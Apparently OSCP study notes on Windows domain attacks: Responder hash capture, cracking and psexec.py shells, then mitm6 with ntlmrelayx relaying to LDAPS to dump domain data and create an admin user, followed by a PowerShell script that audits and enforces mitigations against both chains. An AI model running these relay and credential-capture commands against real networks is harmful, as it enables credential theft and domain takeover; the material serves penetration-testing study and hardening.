OSCP Notes

Attack Vectors

The following method requires user interaction (for example a user logging in over an RDP session):
  1. Run Responder (responder.py) to listen for and capture authentication attempts on the network.
  2. Obtain the captured hashes and crack them offline.
  3. Gain a shell with psexec.py.
  • syntax -> psexec.py DOMAIN.local/username:PASSWORD@IP_ADDRESS

Attacking LDAP Secure with mitm6!

  1. Download mitm6 and install it with pip3 (pip3 install . from its directory).
  2. Set up LDAPS on the Windows server:
  • Server Manager -> Manage -> Add Roles and Features -> add Active Directory Certificate Services -> configure ADCS (restart option enabled) -> select Certification Authority -> restart the machine
  3. python3 mitm6.py -d marvel.local (run from the opt folder) -> this starts listening for connections
  4. ntlmrelayx.py -6 -t ldaps://DOMAINCONTROLLER_IP -wh fakewpad.marvel.local -l lootme
  5. When a user restarts a computer (or logs in), the loot from the relayed session is written to a folder called "lootme".
If you open those files in Firefox, you can see all kinds of secrets (the dumped domain information).
If the relayed user is an admin, ntlmrelayx creates a new user with admin privileges.
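Both chains above depend on Windows defaults: LLMNR/NBT-NS fallback name resolution (what Responder poisons), unsigned SMB (what a captured authentication can be relayed to), and the IPv6/WPAD behaviour that lets mitm6 become the DHCPv6 server and hand out fakewpad, which ntlmrelayx then relays to LDAP/LDAPS. The script below is an added defender-side example written for these notes, not code from the page or from the mitm6/Impacket projects. It audits, and with -Enforce applies, the host settings that close those defaults. The registry paths and values are the documented Windows policy locations; the firewall rule names, the table layout and the choice of disabling the WinHttpAutoProxySvc service as the WPAD mitigation (one of several Microsoft-documented options, so verify it on your build) are this example's own assumptions.

```powershell
<#
  Added example (not from the original notes): audit (default) or enforce (-Enforce)
  the Windows settings that blunt the two chains in these notes:
    * Responder / psexec: LLMNR and NetBIOS name poisoning, NTLM relay to SMB
    * mitm6 / ntlmrelayx: rogue DHCPv6 + fake WPAD, NTLM relay to LDAP/LDAPS
  Run elevated. Registry paths/values are the standard policy locations; the rule
  names, report layout and the Block-* firewall rules are this script's own choices.
#>
[CmdletBinding()]
param(
    [switch]$Enforce,            # write settings instead of only reporting them
    [switch]$DomainController    # also check/set the LDAP server-side requirements
)

# Registry-backed mitigations: where, which value, what is required, and why.
$Settings = @(
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
       Name = 'EnableMulticast'; Value = 0
       Why  = 'LLMNR off - nothing for Responder to poison' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
       Name = 'RequireSecuritySignature'; Value = 1
       Why  = 'SMB client signing required - captured auth cannot be relayed to SMB' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
       Name = 'RequireSecuritySignature'; Value = 1
       Why  = 'SMB server signing required' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc'
       Name = 'Start'; Value = 4
       Why  = 'WPAD auto-proxy service disabled (assumption: verify on your build)' }
)
if ($DomainController) {
    $Settings += @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
                    Name = 'LDAPServerIntegrity'; Value = 2
                    Why  = 'LDAP signing required - relay to ldap:// fails' }
    $Settings += @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
                    Name = 'LdapEnforceChannelBinding'; Value = 2
                    Why  = 'LDAPS channel binding always - relay to ldaps:// fails' }
}

function Get-SettingState {
    param([hashtable]$S)
    $current = $null
    if (Test-Path $S.Path) {
        $current = (Get-ItemProperty -Path $S.Path -ErrorAction SilentlyContinue).($S.Name)
    }
    [pscustomobject]@{
        Setting   = "$($S.Path)\$($S.Name)"
        Expected  = $S.Value
        Current   = $(if ($null -eq $current) { '<not set>' } else { $current })
        Compliant = ($null -ne $current) -and ([int]$current -eq $S.Value)
        Mitigates = $S.Why
    }
}

function Set-SettingState {
    param([hashtable]$S)
    if (-not (Test-Path $S.Path)) { New-Item -Path $S.Path -Force | Out-Null }
    New-ItemProperty -Path $S.Path -Name $S.Name -PropertyType DWord -Value $S.Value -Force | Out-Null
}

$report = @(foreach ($s in $Settings) {
    if ($Enforce) { Set-SettingState $s }
    Get-SettingState $s
})

# NetBIOS over TCP/IP (NBT-NS, Responder's other poisoning target) is per adapter.
# TcpipNetbiosOptions: 0 = from DHCP, 1 = enabled, 2 = disabled.
foreach ($nic in Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE') {
    if ($Enforce -and $nic.TcpipNetbiosOptions -ne 2) {
        Invoke-CimMethod -InputObject $nic -MethodName SetTcpipNetbios `
                         -Arguments @{ TcpipNetbiosOptions = 2 } | Out-Null
        $nic = Get-CimInstance -InputObject $nic   # re-read after the change
    }
    $report += [pscustomobject]@{
        Setting   = "NetBIOS over TCP/IP on '$($nic.Description)'"
        Expected  = 2
        Current   = $nic.TcpipNetbiosOptions
        Compliant = ($nic.TcpipNetbiosOptions -eq 2)
        Mitigates = 'NBT-NS off - nothing for Responder to poison'
    }
}

# mitm6 works because Windows asks for IPv6 configuration on networks that never hand
# it out. Where IPv6 is genuinely unused, block DHCPv6 server replies and router
# advertisements at the host firewall rather than disabling IPv6 outright.
$fwRules = @(
    @{ DisplayName = 'Block DHCPv6 server replies (mitm6)'
       Direction = 'Inbound'; Protocol = 'UDP'; LocalPort = 546; RemotePort = 547; Action = 'Block' },
    @{ DisplayName = 'Block IPv6 router advertisements (mitm6)'
       Direction = 'Inbound'; Protocol = 'ICMPv6'; IcmpType = 134; Action = 'Block' }
)
foreach ($r in $fwRules) {
    $rule = Get-NetFirewallRule -DisplayName $r.DisplayName -ErrorAction SilentlyContinue
    if ($Enforce -and -not $rule) { $rule = New-NetFirewallRule @r }
    $report += [pscustomobject]@{
        Setting   = "Firewall rule '$($r.DisplayName)'"
        Expected  = 'present, enabled'
        Current   = $(if ($rule) { "present, enabled=$($rule.Enabled)" } else { '<missing>' })
        Compliant = [bool]($rule -and "$($rule.Enabled)" -eq 'True')
        Mitigates = 'host never accepts a rogue DHCPv6 server / router'
    }
}

$report | Format-Table -Property Setting, Expected, Current, Compliant, Mitigates -AutoSize -Wrap
```

Run it once without switches to get a compliance table, then with -Enforce (and -DomainController on a DC) to apply. In a domain the same values belong in Group Policy so they survive rebuilds; the script is useful for spot checks and for lab hosts. Blocking router advertisements is only appropriate on networks that do not actually route IPv6, which is exactly the situation mitm6 exploits.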